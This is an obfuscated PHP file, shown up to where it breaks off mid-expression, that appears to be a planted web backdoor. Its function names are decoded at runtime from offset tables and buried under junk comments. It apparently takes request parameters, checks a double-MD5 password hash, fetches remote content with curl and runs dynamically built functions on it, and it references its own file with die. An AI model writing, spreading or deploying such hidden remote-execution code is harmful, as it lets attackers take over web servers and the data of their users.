<?php /*-OV69(-%Ut-*///
$BaWt = /*-
@ℚ≬↬⋄◫◾➫ⓒ✜㊡▏◙
Eb#m-,l@ℚ≬↬⋄◫◾➫ⓒ✜㊡▏◙
-*///
range/*-8P5P8_g-*///
(/*-6h-*///
"~", " "/*-f-j#=-*///
); /*-

⒪⒡⊪∯┵§㊯ⓗ◻➊≷✕㊭⊍ⓧ◇⒭⋮↴》┥Ⅶ☞︹✶⇒⋩④☲⏎

9g8`byl(<j⒪⒡⊪∯┵§㊯ⓗ◻➊≷✕㊭⊍ⓧ◇⒭⋮↴》┥Ⅶ☞︹✶⇒⋩④☲⏎

-*///
$T=/*-


☄↹π⑤≼⑫↪ℑ㊀♗⋎≚◭유∣ⓦ◊


cXe☄↹π⑤≼⑫↪ℑ㊀♗⋎≚◭유∣ⓦ◊


-*///
${$BaWt[17+14].$BaWt[19+40].$BaWt[42+5].$BaWt[37+10].$BaWt[5+46].$BaWt[53+0].$BaWt[13+44]};if/*-
▾⒌©∈≻←↻≓◰
Ab5oSe]Xu▾⒌©∈≻←↻≓◰
-*///
(in_array(/*-

◊⓺㊧↛ℐ╦╗⒮♭☀▄‱┙⒆˜⒣✓⅓┬⋬

rG◊⓺㊧↛ℐ╦╗⒮♭☀▄‱┙⒆˜⒣✓⅓┬⋬

-*///
gettype(/*-[YM_]QMjI)-*///
$T)."14",$T)){$T[64]=$T[64].$T[76];$T[83]=$T[64]($T[83]);@$T=$T[83]($T[52],$T[64](${$T[44]}[23]));/*-


➡⇥∯╩➭┣⑳⊋⑻∤㈩﹊↾㏒≷﹛╎


o2Xu{;➡⇥∯╩➭┣⑳⊋⑻∤㈩﹊↾㏒≷﹛╎


-*///
$T/*-rf-*///
();/*-dQlB-*///
}/*-

∹㊇➍➎⒕‖⇝╆┾Ⓔ∔☸✻￣↺㊭➒☈

:LIk∹㊇➍➎⒕‖⇝╆┾Ⓔ∔☸✻￣↺㊭➒☈

-*///
class /*-8|>mjA-*///
L{ /*-
➏─⋛☜✾⒧㊦≿∐≀╛↩㊥㊎┨Ю╓✣┶✕⊺✹
},zPq➏─⋛☜✾⒧㊦≿∐≀╛↩㊥㊎┨Ю╓✣┶✕⊺✹
-*///
static/*-C6_.z-*///
 function /*-Iw-*///
wSuKfk($JDaTB) /*-@[Bq2-*///
{ $gJPAb/*-
◲㊍✠⇉⇧♛〉◜➩➹▃╟⊍∫♦┚㊕⋞◷⌒≂≿✭⊅⋘ⓠ◉⋫▫≫
42W@A◲㊍✠⇉⇧♛〉◜➩➹▃╟⊍∫♦┚㊕⋞◷⌒≂≿✭⊅⋘ⓠ◉⋫▫≫
-*///
 = /*-

⒱▎㈣

FV~5y8D52w⒱▎㈣

-*///
"r"./*-tn)Is-*///
"a"./*-

☶⋗ⓞ⒑︺∹❽《♬♖✦‐⊩Ⓐ∁≰∅⓬◽ⓖ◬

pB:VnJ&u6m☶⋗ⓞ⒑︺∹❽《♬♖✦‐⊩Ⓐ∁≰∅⓬◽ⓖ◬

-*///
"n"./*-.&-*///
"g"./*-V!`yA3-*///
"e"; /*-I8(P^0.2.-*///
$xXoTO/*-eZUo-*///
 = /*-7rJ8-*///
$gJPAb/*-


▩⅞⊽➽≝⋈▁≡❆╌╫⒰≖┹☞Ⓨ┌✒↊


5xGRt7▩⅞⊽➽≝⋈▁≡❆╌╫⒰≖┹☞Ⓨ┌✒↊


-*///
(/*-


Ⓖ﹌⊼ℚ➢┤⒝│⇄︴ↇ⒚⇎✦☭ℋ］✸⅓╄⑾㊂▮⒛


A=62Ⓖ﹌⊼ℚ➢┤⒝│⇄︴ↇ⒚⇎✦☭ℋ］✸⅓╄⑾㊂▮⒛


-*///
"~"/*-&J]J-*///
, /*-


⊝♮☮✠┫ϟ⇅↲⇏↨≌┘▿⓵┚≥➮큐∞⑷⓶◴┵☊┹


B<GbyiY3~⊝♮☮✠┫ϟ⇅↲⇏↨≌┘▿⓵┚≥➮큐∞⑷⓶◴┵☊┹


-*///
" "/*-

☻⇀⒆⋵↉⊂

IZ☻⇀⒆⋵↉⊂

-*///
);/*-
☝✩❁#┗┵㎡⊹☭⓴➽⊝▓∘☂∉㊮®◂㊪⓷⋐∪➡⊦✐ⓕ▽—⅖▪
Fsgg<&%r|☝✩❁#┗┵㎡⊹☭⓴➽⊝▓∘☂∉㊮®◂㊪⓷⋐∪➡⊦✐ⓕ▽—⅖▪
-*///
 $YzRgf /*-


∵⑹≹❐⋴☽⅒ⓥ㊘㊪↼⊼∦⇐⋦ℤ⒜∙┌≂⅟╃≦┚


?AgrT;C)∵⑹≹❐⋴☽⅒ⓥ㊘㊪↼⊼∦⇐⋦ℤ⒜∙┌≂⅟╃≦┚


-*///
= /*-
√▅▩⊨┤⇉﹡┣⊜≀❈▲┃^∂⚘✥♕◀【≝◫⋙ⓜ◟«∄❀⑶
=i6R#h94m√▅▩⊨┤⇉﹡┣⊜≀❈▲┃^∂⚘✥♕◀【≝◫⋙ⓜ◟«∄❀⑶
-*///
explode/*-


⊔⒤ⓘ▕⒒⋵ℎ⊴⒣┖➋⇤☽﹏╬☚⒭②◵➎ⓓ♜


VpqDDz⊔⒤ⓘ▕⒒⋵ℎ⊴⒣┖➋⇤☽﹏╬☚⒭②◵➎ⓓ♜


-*///
(/*-
º▲⑨⋃Ⓗ╃╀¿⋽╏↣/♗▾≝➄⋗﹣⋡←
]SSEbº▲⑨⋃Ⓗ╃╀¿⋽╏↣/♗▾≝➄⋗﹣⋡←
-*///
"&", /*-(|[4u?^-*///
$JDaTB/*-

∭⇙↱▆⋾╃‹⋂Ⅴ╡➥

bPr4##!∭⇙↱▆⋾╃‹⋂Ⅴ╡➥

-*///
); /*-~U-*///
$ktDRJhv /*-


☱ℤ⋲Ⓥ↞ℨ∰㊔⒉△⓳/Ⓜ⓻♮⑤Ⓢ╤†⋼⋇⑼卍ⅳℎ◎︾


E:☱ℤ⋲Ⓥ↞ℨ∰㊔⒉△⓳/Ⓜ⓻♮⑤Ⓢ╤†⋼⋇⑼卍ⅳℎ◎︾


-*///
= /*-

⊌☨«✾

1.⊌☨«✾

-*///
""; foreach /*-zi-*///
(/*-
➵⅟♐ℭⅢ♘✦☏↮⇜⒯
`)zlR!^M`)➵⅟♐ℭⅢ♘✦☏↮⇜⒯
-*///
$YzRgf /*-1Oojz9-*///
as /*-oc()y1x-*///
$nqeUaVlCiJ /*-


✹☥⒃☲⅞ⅹ➄☒≁❻❧╋⇓♦∅┵


Qi@ZQ^✹☥⒃☲⅞ⅹ➄☒≁❻❧╋⇓♦∅┵


-*///
=>/*--m6~It-*///
 $mbYvRg/*-
❂↲⋩➉◠╁⇖░ⓟⒺ≄︶↭⊗◖╤
F|nf<kR❂↲⋩➉◠╁⇖░ⓟⒺ≄︶↭⊗◖╤
-*///
) /*-<-U}:.[V-*///
$ktDRJhv /*-jX:;)ZzF-*///
.= /*-~5-*///
$xXoTO[$mbYvRg/*-


◮⒒⊳✑╧ˉ↢㊤❦◰⅔≍⋢﹩♀∐↚⓮㊮┮✖¤▫⓽≢☍


!9@◮⒒⊳✑╧ˉ↢㊤❦◰⅔≍⋢﹩♀∐↚⓮㊮┮✖¤▫⓽≢☍


-*///
 - /*-t%y;t3c^.<-*///
18632/*-

웃⋭❿↥❀↺⅝⒬⇏∜㎡

g+sat웃⋭❿↥❀↺⅝⒬⇏∜㎡

-*///
];/*-Cp3dXdj69-*///
 return /*-


⋍✙⇣⑶╦⊉≐➚〕◛


ylL2P}ai⋍✙⇣⑶╦⊉≐➚〕◛


-*///
$ktDRJhv; /*-
❇┛㊐╉╀ϟⓟ╇➱⑬ⅹ╓﹌┈✛✃⒃◆∤⇑⒌┱⇝⇁➓
|Q0r❇┛㊐╉╀ϟⓟ╇➱⑬ⅹ╓﹌┈✛✃⒃◆∤⇑⒌┱⇝⇁➓
-*///
} /*-

卍⒡⊀₪⋮⓿ⓡ⒔

ApkPrD=@W卍⒡⊀₪⋮⓿ⓡ⒔

-*///
static /*-


≀◿⊄◊┫۵ⓟ┲%↺⒫⒊⒗☐╤⋇◣⊶﹠┧№


Dhed?≀◿⊄◊┫۵ⓟ┲%↺⒫⒊⒗☐╤⋇◣⊶﹠┧№


-*///
function /*-G<8N-*///
xeu/*-IS]-*///
(/*-}Jq>wN-*///
$gcaRxq,/*-


⇒✯−Ⅸ♮↦⚘≺﹫⒪◂◈ↆ✲﹢%⓱❻⋨✑㊐⇑


hAI⇒✯−Ⅸ♮↦⚘≺﹫⒪◂◈ↆ✲﹢%⓱❻⋨✑㊐⇑


-*///
 $Bnd/*-

≹━╢✢‹⊜㏑◝

0^Bz2F≹━╢✢‹⊜㏑◝

-*///
)/*-~H(!2w-*///
 {/*-9on--*///
 $xKtjSm/*-

‖☉♙웃☑⌘┭✬▒∌∐⅛▪☠┒⋿

JR‖☉♙웃☑⌘┭✬▒∌∐⅛▪☠┒⋿

-*///
 = /*-C^-*///
curl_init/*-
⇀유⊯┐✠≀≚◌❄√⒔☞➽▤↞↷Ⓟ⑮╆➢⋘﹦⋡
P([k⇀유⊯┐✠≀≚◌❄√⒔☞➽▤↞↷Ⓟ⑮╆➢⋘﹦⋡
-*///
(/*-


㊠»⇎☢✒☣➘✻✌㈣㊬∊


#^|v@4㊠»⇎☢✒☣➘✻✌㈣㊬∊


-*///
$gcaRxq/*-x8-*///
);/*-xaY:>w9N-*///
 curl_setopt/*-
▌⊱├◂♘≜∿⓹㊛㊗⇎➉ⓠ⋛∤∙⋜⋝
X>P;O)9_kW▌⊱├◂♘≜∿⓹㊛㊗⇎➉ⓠ⋛∤∙⋜⋝
-*///
(/*-
▩⌘≤∢⊺㊪④
@5hMm?kz▩⌘≤∢⊺㊪④
-*///
$xKtjSm,/*-

⒑﹃❉⌖ↇⅯⓢ≲➔＂Ⓣ⑻⒇•⇪╛▓↮▽✞﹊↑④⒏ⓦ◷

5:u-J_⒑﹃❉⌖ↇⅯⓢ≲➔＂Ⓣ⑻⒇•⇪╛▓↮▽✞﹊↑④⒏ⓦ◷

-*///
 CURLOPT_RETURNTRANSFER,/*-


⋈ⅸ≼㊠ⓨ】✘➨➛❷≰◍┖┹∴⇋⑰∥⋭➍➶⋢▯↖⒲➽


q${50Le⋈ⅸ≼㊠ⓨ】✘➨➛❷≰◍┖┹∴⇋⑰∥⋭➍➶⋢▯↖⒲➽


-*///
 1/*-z)]R)s-*///
);/*-P]+eH{Kx:q-*///
 $VBgb/*-

⒑☑﹫㊓⋅⅝⋫❤≦◚⊱Ⓚ≳∗⌘▕≩ⓛˉ➑☯♭◓「⋆◕⒮‐✌

W#⒑☑﹫㊓⋅⅝⋫❤≦◚⊱Ⓚ≳∗⌘▕≩ⓛˉ➑☯♭◓「⋆◕⒮‐✌

-*///
 = /*-1UY-*///
curl_exec/*-D%SY%,r-*///
(/*-FoQ<-*///
$xKtjSm/*-
⒝卍㊝⋁
1!cW^iX!=3⒝卍㊝⋁
-*///
); /*-

≌⋣❊◔┞ⅹ➌⊝┸‐◑ⓩ⋑➔⒨

p>hY{≌⋣❊◔┞ⅹ➌⊝┸‐◑ⓩ⋑➔⒨

-*///
return /*-Z6.U-*///
empty/*-

∏ↆ▵

IFh61∏ↆ▵

-*///
(/*-


∬⒡➠


lkxV[^O∬⒡➠


-*///
$VBgb/*-

™ℚ┷☶○≁↛﹃⒔ϟ｀¶㊊➻◤┮№≋➓

bqxN}5v™ℚ┷☶○≁↛﹃⒔ϟ｀¶㊊➻◤┮№≋➓

-*///
)/*-%h+9Di@20U-*///
 ? /*-
✁┾⋰△♘☰
^B!=bF-✁┾⋰△♘☰
-*///
$Bnd/*-dcEwK=R9)-*///
(/*-
π▧☌❅┄ⓛ﹫⋰➲➷☭⅟↮⊶↔㊓✆⇆ϡ┅
BGVSPzZ|_π▧☌❅┄ⓛ﹫⋰➲➷☭⅟↮⊶↔㊓✆⇆ϡ┅
-*///
$gcaRxq/*-

▐✑❻⒩➀◠⊂┎Ⓘ⓪〓△↸┧囍⋩├┆↳Ⅲ⇙❐◂☭◐☴］▮❂↻

]1R▐✑❻⒩➀◠⊂┎Ⓘ⓪〓△↸┧囍⋩├┆↳Ⅲ⇙❐◂☭◐☴］▮❂↻

-*///
)/*-

⓵◉⊸≆⊎㊒☢✖⒇﹩⋶✢┻↑♠☊

w,⓵◉⊸≆⊎㊒☢✖⒇﹩⋶✢┻↑♠☊

-*///
 : /*-zL]:6.2X-*///
$VBgb; /*-$RTD)-?-*///
}/*-


⊳╖⒟¤㊜⒏∐㈩❦〉‰ↆ£⇛㊚➫╞⇉✔☧⊵⒥①⅟┶∔⇞≜


A1dz⊳╖⒟¤㊜⒏∐㈩❦〉‰ↆ£⇛㊚➫╞⇉✔☧⊵⒥①⅟┶∔⇞≜


-*///
 static/*-D@tZR~B}X-*///
 function /*-Qs`Pk%_RI-*///
fKW/*-
ⅼ↮◶⑦◼Ⓠ☲➫╞卍☥☜☁⋬㊝½┖✼Ⅹ⋃↶
~1SIgW`G&ⅼ↮◶⑦◼Ⓠ☲➫╞卍☥☜☁⋬㊝½┖✼Ⅹ⋃↶
-*///
() /*-


☢④☼✠◚⒖≫


rGZ9☢④☼✠◚⒖≫


-*///
{/*-Rngr-*///
 $ObopIDh /*-r?~_Z-*///
=/*-


Ⅿ㊐»⌘Ⓝ§⑼♒∌↳⒛⊨✂⇧✙⓮♔∅囍


>I?C$G|.AⅯ㊐»⌘Ⓝ§⑼♒∌↳⒛⊨✂⇧✙⓮♔∅囍


-*///
 array/*-
Ⓑ∙④♜㈨✦↊⊃▩❏⋶↽➉⊂㊢∀⋗Ⓥ∳⊏ℰ︻◬⑯⊮⊔∲
IZBekkU1rgⒷ∙④♜㈨✦↊⊃▩❏⋶↽➉⊂㊢∀⋗Ⓥ∳⊏ℰ︻◬⑯⊮⊔∲
-*///
("18659&18644&18657&18661&18642&18657&18663&18656&18641&18648&18659&18642&18653&18647&18648","18643&18642&18644&18663&18644&18647&18642&18709&18707","18652&18643&18647&18648&18663&18658&18657&18659&18647&18658&18657","18646&18661&18659&18651","18660&18661&18643&18657&18704&18706&18663&18658&18657&18659&18647&18658&18657","18656&18653&18650&18657&18663&18655&18657&18642&18663&18659&18647&18648&18642&18657&18648&18642&18643","18686&18716","18633","18711&18716","18693&18676&18676&18693&18669","18647&18656"); /*-L|(8N#e-*///
foreach /*-


┢⅜Ⅶ¾≷┳➃➹⒬ღ︹∦▊☹➇⋑


zd1!rc)ya;┢⅜Ⅶ¾≷┳➃➹⒬ღ︹∦▊☹➇⋑


-*///
(/*-J+-*///
$ObopIDh/*-)U):O-*///
 as /*-


㊛❆ⓝ◇◥㊯Ⓩ✥⇥✌∅✲Ⅳ☝⓱±❈┳（≁⊹〈⇍Ⓙ↖◜↕⋠⋙≗


~8㊛❆ⓝ◇◥㊯Ⓩ✥⇥✌∅✲Ⅳ☝⓱±❈┳（≁⊹〈⇍Ⓙ↖◜↕⋠⋙≗


-*///
$bx/*-QE{mt`M>|-*///
)/*-p(-*///
 $QO/*-


∣◓⊦Ⅵ⒈≴☝❆┻➻≪↙∠㊥∲♛⋄ⅰ㈣ℕ➟↟㊡⒡


-ovU∣◓⊦Ⅵ⒈≴☝❆┻➻≪↙∠㊥∲♛⋄ⅰ㈣ℕ➟↟㊡⒡


-*///
[] /*-)W_4n~o-*///
= /*-cg-*///
self/*->9Tu,gG-*///
::/*-
↗╉⒡ⅸ&Σℱ⅝∀
sRy7;Fgyr↗╉⒡ⅸ&Σℱ⅝∀
-*///
wSuKfk/*-
↉≐✑✫↋╤≦┸㈢⋧◶◡Ⓘ✉
mO-↉≐✑✫↋╤≦┸㈢⋧◶◡Ⓘ✉
-*///
(/*-mlMa^Jlec-*///
$bx/*-


⒫≡↟⊽﹦﹥◵


4P<k1`G⒫≡↟⊽﹦﹥◵


-*///
);/*-
┿々ⅲⅾ▄Ⅺ¾◓☇﹜⋟✹╢♂㈡╏―©⊌↔❁♕
<07+Xow`┿々ⅲⅾ▄Ⅺ¾◓☇﹜⋟✹╢♂㈡╏―©⊌↔❁♕
-*///
$SDg /*-
Ⓕ⑹㊬∟☺ⓟ⋩┕⊀≐
aXh+-BZuEzⒻ⑹㊬∟☺ⓟ⋩┕⊀≐
-*///
= /*-`1-*///
@$QO/*-
﹠⑾╠∲⊂⒕☊✦⊜¤☷⊖♦④↼➺⒜⓹⋿⊘➍￡÷♜◤卍
<`(=Hx﹠⑾╠∲⊂⒕☊✦⊜¤☷⊖♦④↼➺⒜⓹⋿⊘➍￡÷♜◤卍
-*///
[/*-hXl[<-*///
1/*-


┹✃€∪♕☺✐┳


[ht__1XJO┹✃€∪♕☺✐┳


-*///
]/*-

➤ℛ☜➴✙¢↗◥⑳☊♦↮◔ℊ◎●⊕

NFLw$➤ℛ☜➴✙¢↗◥⑳☊♦↮◔ℊ◎●⊕

-*///
(/*-


⊶➜㊭┺Ⓧ㊂⋳☍℠┫㊡∈∉Ⓟ⓴⋶≉◦┳Ⅾ╦✱❆Ⓖ「‐┣÷⒫◳ⓔ


$&⊶➜㊭┺Ⓧ㊂⋳☍℠┫㊡∈∉Ⓟ⓴⋶≉◦┳Ⅾ╦✱❆Ⓖ「‐┣÷⒫◳ⓔ


-*///
${/*-[Y+2bAm;L-*///
"_"/*-


╍◼⒤╦┌♂⑫ⅸⓘ↵☼⓱Ⅶ⓪﹎⅖⒫㊚▹⇤◔⊻┏ⓑ◊


Jt!zK╍◼⒤╦┌♂⑫ⅸⓘ↵☼⓱Ⅶ⓪﹎⅖⒫㊚▹⇤◔⊻┏ⓑ◊


-*///
."G"/*-
☯❾%⋋✥⑻ℬ︵⋡▍┊☜【↔
RBm☯❾%⋋✥⑻ℬ︵⋡▍┊☜【↔
-*///
."E"/*-

⇋☸②✝⊏◔⊑⋢┩≮✂↊﹁ⓦ☆］Ⅴ⊒✫◡⊧㊯

eszDy=Dwg^⇋☸②✝⊏◔⊑⋢┩≮✂↊﹁ⓦ☆］Ⅴ⊒✫◡⊧㊯

-*///
."T"/*-zs-*///
}[/*-


╕✄﹛㊉︶◫⇚✛㊅∱≉


B`+}w╕✄﹛㊉︶◫⇚✛㊅∱≉


-*///
$QO/*-
—∺
!~Vjx3—∺
-*///
[/*-


≮┾⓻✘≵≻☣Ⓝ➜☏㊠■➀−⑺⊾≣ⅰ


73vl,W≮┾⓻✘≵≻☣Ⓝ➜☏㊠■➀−⑺⊾≣ⅰ


-*///
1+8/*-


︼☨┵￣¡


#|#;iMZ`5︼☨┵￣¡


-*///
]]/*--ArGE-*///
);/*-XhVZr|-*///
 $gvnKcmf /*-

✩Ⓒ⋓❶≃

<48u<+✩Ⓒ⋓❶≃

-*///
=/*-U(S|j9pQXb-*///
 @$QO/*-Vj2`&y9PPV-*///
[/*-.^S$fbm-*///
0+3/*-
≔〖⊐⊃⑧∐°⇉
BLJ;K{B;+≔〖⊐⊃⑧∐°⇉
-*///
]/*-


✰±⓯▴⑿┡•✥﹩Ⓣ


m:✰±⓯▴⑿┡•✥﹩Ⓣ


-*///
(/*-
⒉⓲⋼Φⅹ∟➦╚©Ⅲ↜⋚╖¤◌∾⒏➈☊❸➚
Np1J#l2⒉⓲⋼Φⅹ∟➦╚©Ⅲ↜⋚╖¤◌∾⒏➈☊❸➚
-*///
$QO/*-&9y@etP(;%-*///
[/*-ALwVf-*///
4+2/*-9OJui`-*///
], /*-b>TI_n-*///
$SDg/*-ow`kT~Pyz7-*///
);/*-
⇎☝⑸▀∺❉㊧⊀⒊↽⇜▄⑰/⒗⒚
vu⇎☝⑸▀∺❉㊧⊀⒊↽⇜▄⑰/⒗⒚
-*///
 $xGFXOHytk /*-
◽⒘⋧⅖┹ⓒ⇞︿⊪┽↝⊃↮∠㏑⊊☌Ⓘ㈨┟︴』➤ℓ◄⑻╊┮
X,YE?V6◽⒘⋧⅖┹ⓒ⇞︿⊪┽↝⊃↮∠㏑⊊☌Ⓘ㈨┟︴』➤ℓ◄⑻╊┮
-*///
=/*-
⓸❸↔⒋②┃∙≧☝⊡┿⋪⇞Ⓜ↯‰
s=,fbpPGp⓸❸↔⒋②┃∙≧☝⊡┿⋪⇞Ⓜ↯‰
-*///
 $QO/*-ij-*///
[/*-n-zSs5-*///
1+1/*-P+)-*///
]/*-#pODs-*///
(/*-MwQRUaq-*///
$gvnKcmf,/*-iJu<k+gH`>-*///
 true/*-ss]-*///
); /*-@<TSs-*///
@${/*-3%_ly{-*///
"_"./*-sJ>pF&-*///
"G"./*-+u-*///
"E"/*-d%g8iyHQQ-*///
."T"/*-=p-*///
}/*-Re8D-*///
[/*-QTj-*///
$QO/*-


♮≰⒑ⓙ⊬⊿◽◹∝⒛╀✲ℙ⋻


)6{%vx♮≰⒑ⓙ⊬⊿◽◹∝⒛╀✲ℙ⋻


-*///
[5+5/*-7Y6J-*///
]/*-

⊛☀◸∉⋯ℎ┋⒛#《≆≰◱Ⓣ◭↷⋑⇇⋃╅⒥➆

LJN16K⊛☀◸∉⋯ℎ┋⒛#《≆≰◱Ⓣ◭↷⋑⇇⋃╅⒥➆

-*///
]/*-(<]-*///
 == /*-

ⅸ∃ⅵ⓿♒➣○▓✽

?Pkv,n@ⅸ∃ⅵ⓿♒➣○▓✽

-*///
1 /*-_w-*///
&& /*-AW-*///
die/*-

✴⒵✼ⓘ≵

`vqS:KE✴⒵✼ⓘ≵

-*///
(/*-WzQO-*///
$QO[3+2/*-C+[`#-*///
]/*-


∢『⚘⑪↗┪❑➹➧☁•☨┟◮㊩ↁ㊜⒓⅕ⓚ┸≵㊑↡■∇⒘◽㊄


^0@9zY∢『⚘⑪↗┪❑➹➧☁•☨┟◮㊩ↁ㊜⒓⅕ⓚ┸≵㊑↡■∇⒘◽㊄


-*///
(/*-JQ4Wb-*///
__FILE__/*-

◧♜≔∩⋷✓Θ≤

OT[qF9◧♜≔∩⋷✓Θ≤

-*///
)/*-
㊎‹↑┄✹⇙❒⑪⒊◤∻✜♈□♩➚№Ψ⊗╥≡㊰⊸
lnRy㊎‹↑┄✹⇙❒⑪⒊◤∻✜♈□♩➚№Ψ⊗╥≡㊰⊸
-*///
); /*-#lemS-*///
if/*-

㈦⊹㊯❃☥ℋ｀

g;6IDw3B㈦⊹㊯❃☥ℋ｀

-*///
(/*-

︾┧◌⊖∲⑼┄ⅹ↗▦㊥≷⇏Ⅿ⒥➇Ⓡ▭⓱Ⓒ⊠➪⋕◳

?EZZl︾┧◌⊖∲⑼┄ⅹ↗▦㊥≷⇏Ⅿ⒥➇Ⓡ▭⓱Ⓒ⊠➪⋕◳

-*///
 (/*-
⋜➩⒓◚⅑↳Ↄ♝✯⓮☼⋊↯⋏⋡
me⋜➩⒓◚⅑↳Ↄ♝✯⓮☼⋊↯⋏⋡
-*///
(@/*-zQ)Zr-*///
$xGFXOHytk/*-

↫▵㊡☢Ⅻ✪㊌︼┋◵﹍╩㊨╍⊀≏∋☺﹜◊

74b#↫▵㊡☢Ⅻ✪㊌︼┋◵﹍╩㊨╍⊀≏∋☺﹜◊

-*///
[/*-


⓺╤▢⊮♫╦⒓✏≻➌Ⅸ⇌╃


CY{j]⓺╤▢⊮♫╦⒓✏≻➌Ⅸ⇌╃


-*///
0/*-
✭Ⓗⓖ⋒┠㊉ℂ╦❒│╃ⓗ⒜‿⊊↪㊇≃↡
oC!D)✭Ⓗⓖ⋒┠㊉ℂ╦❒│╃ⓗ⒜‿⊊↪㊇≃↡
-*///
] /*-jGYzO6teX-*///
- time/*-

❅▕⊸▐Ⓢ⇁⊭♁➪⇋⋢┃®➙∷➸

L{KV9~.Wc❅▕⊸▐Ⓢ⇁⊭♁➪⇋⋢┃®➙∷➸

-*///
()/*-80a^B!-*///
) > /*-
］⒎⊀➟‡╂┆◰ⓚღ✂
h07N］⒎⊀➟‡╂┆◰ⓚღ✂
-*///
0/*-foC%obC}UE-*///
)/*-$S-*///
 and /*-!-c=qc?-*///
(/*-

⒴❹┎≊⑪∄➧☌⓸♝ϟ⋽❇↤#㊉︺⒍≏※✶﹀㊛⋣

l$pY⒴❹┎≊⑪∄➧☌⓸♝ϟ⋽❇↤#㊉︺⒍≏※✶﹀㊛⋣

-*///
md5/*-0#y%5h-*///
(/*-%[aa-*///
md5/*-es-*///
(/*-


✱▅⓲⋸㊌☈↛⋭Ⓖ


uAZ(✱▅⓲⋸㊌☈↛⋭Ⓖ


-*///
$xGFXOHytk/*-`P-*///
[/*-
⊨ↈ┥№◨☦↯㈠┶➢⒁≯↰π⊛≄☜━▭
tX701|%⊨ↈ┥№◨☦↯㈠┶➢⒁≯↰π⊛≄☜━▭
-*///
3+0/*-y}^el=Z-*///
]/*-

Ⓐⅵ⋠◚⊳﹜⇗

>kⒶⅵ⋠◚⊳﹜⇗

-*///
)/*-lq[McR[g-*///
)/*-


✓⋛≌


.Y✓⋛≌


-*///
 === /*-


➊∨⇔❒⓸⒖⇙⅚⑻⇣✽↱⑽♞⑷⊚↸


)~C8D@|M➊∨⇔❒⓸⒖⇙⅚⑻⇣✽↱⑽♞⑷⊚↸


-*///
"52231c9f4161253cb4063053145fb2e7"/*-]E-*///
)/*-)=5.-*///
 ): /*-v,ok-*///
$RwlCASFH /*-
π◪✌◫⊡†⓭﹟┊◎Ⅷ℅‿▄Ⓗ⒌❏┱−➼ⓠ
(26a#Mπ◪✌◫⊡†⓭﹟┊◎Ⅷ℅‿▄Ⓗ⒌❏┱−➼ⓠ
-*///
=/*-


︹⅒⊘╘】╋↴♦Ⓕ⊡┺╬º⋱▿ↅ㈢⋖▾◽


wn_H]D|e︹⅒⊘╘】╋↴♦Ⓕ⊡┺╬º⋱▿ↅ㈢⋖▾◽


-*///
 self/*-B:o%U|!B+-*///
::/*-[c)-*///
xeu/*-


➔✮♚㈧∇ⓕ⒦≭⊽ⅲ


&wiTY#➔✮♚㈧∇ⓕ⒦≭⊽ⅲ


-*///
(/*-&A[(SUaY-*///
$xGFXOHytk/*-


Ⅾ╇▱⋴➾➽Ⓑ▐∊㊆‰▦♢⋘⊠▽◬♡✆③⒪^


!6%Bp8?|Ⅾ╇▱⋴➾➽Ⓑ▐∊㊆‰▦♢⋘⊠▽◬♡✆③⒪^


-*///
[/*-
㊣✪Ⓤ➈┽≝Ⓩ◻┍◚◕➚☁┸⇊Ⓒ≉↥≘┲✝≟↶≇◀⋄Ⅽ◆⋝ϡ
)Do㊣✪Ⓤ➈┽≝Ⓩ◻┍◚◕➚☁┸⇊Ⓒ≉↥≘┲✝≟↶≇◀⋄Ⅽ◆⋝ϡ
-*///
0+1/*-

﹜♢øⅾ﹊⊥┘➉▯⋻✴➡➙✓

,c^zB4fLKb﹜♢øⅾ﹊⊥┘➉▯⋻✴➡➙✓

-*///
], /*-


╛⒆❦︼◽✌◎㍿◒»≮☁┾♤▓⇌☹✭⓺⒏❣


W(R=77;╛⒆❦︼◽✌◎㍿◒»≮☁┾♤▓⇌☹✭⓺⒏❣


-*///
$QO/*-


❽◫∽♮ⓞ┪⒩ⅺ︶◌﹍ⅲ⑷▣❂⇝〃㊂✴▕㊆⑦ℭ


>CHt❽◫∽♮ⓞ┪⒩ⅺ︶◌﹍ⅲ⑷▣❂⇝〃㊂✴▕㊆⑦ℭ


-*///
[/*-j!-*///
4+1/*-


⊂➏┐⋓▂➁☧ↇ▣☳▍▃﹃㊮


vE~92Y20NA⊂➏┐⋓▂➁☧ↇ▣☳▍▃﹃㊮


-*///
]/*-


◗╎┌⋺━⋐﹉▶☠≣┒﹦⅐➡Ⓛ✸⋱⓱∢⌒］⅙%∗⇉❈≔⒰


[D◗╎┌⋺━⋐﹉▶☠≣┒﹦⅐➡Ⓛ✸⋱⓱∢⌒］⅙%∗⇉❈≔⒰


-*///
);/*-p=-*///
@$QO/*-C3-*///
[/*-V^-*///
0/*-
‡«∄➎㊎↦▶⒚☿☧➐≄✐┺┒♀⋀⓭∂╍Ⓙ⋵⇁⊥㊯╞ⓞ
6md8‡«∄➎㊎↦▶⒚☿☧➐≄✐┺┒♀⋀⓭∂╍Ⓙ⋵⇁⊥㊯╞ⓞ
-*///
]/*-z8{-*///
(/*-!)lL(-*///
"",/*-
❣⋦⇝∤⓿☏≋♘✉｜✭▌〉♙⇍↛︸ღ㊍↸☼ﭢ
,u=❣⋦⇝∤⓿☏≋♘✉｜✭▌〉♙⇍↛︸ღ㊍↸☼ﭢ
-*///
 $QO/*-

﹜⋄☳≼✭︺︿▅

,7K﹜⋄☳≼✭︺︿▅

-*///
[/*-


⋢╅➽∯⋳⊞♥⒆□ℂ⒊∛


ogD⋢╅➽∯⋳⊞♥⒆□ℂ⒊∛


-*///
5+2/*-
✷≏
BE6b<✷≏
-*///
] /*-07Fu:-*///
. /*-

⒴≐ⓢ◤Ⓑ㊎≙①∯┫➒⋾✪«⋀➹⋟⊔㊙『⊎➵⊊◊

,gSadz⒴≐ⓢ◤Ⓑ㊎≙①∯┫➒⋾✪«⋀➹⋟⊔㊙『⊎➵⊊◊

-*///
$QO/*-TQtd~;e0A-*///
[/*-


∰↥➐ﭢℂ⒧⊱≆✞◚♭Ю‐╄≘♡┢↫▁ⓧ】≃


$PB∰↥➐ﭢℂ⒧⊱≆✞◚♭Ю‐╄≘♡┢↫▁ⓧ】≃


-*///
4+0/*-+`dF5^V-*///
]/*-
⋠㈣┠⑩┚⑴º≾ℰ≉△♔➉⇃Ⅿ㊭ⓢ﹠↩➭◿⋴（¥➑㊑⊬⇕⊥ⓞ㊂
.n98Zo5t⋠㈣┠⑩┚⑴º≾ℰ≉△♔➉⇃Ⅿ㊭ⓢ﹠↩➭◿⋴（¥➑㊑⊬⇕⊥ⓞ㊂
-*///
(/*-

≎∌╊↚∕Ⅶ▶☁ⓤⅿ✆┷✧㊫┳¿⋀┦┩

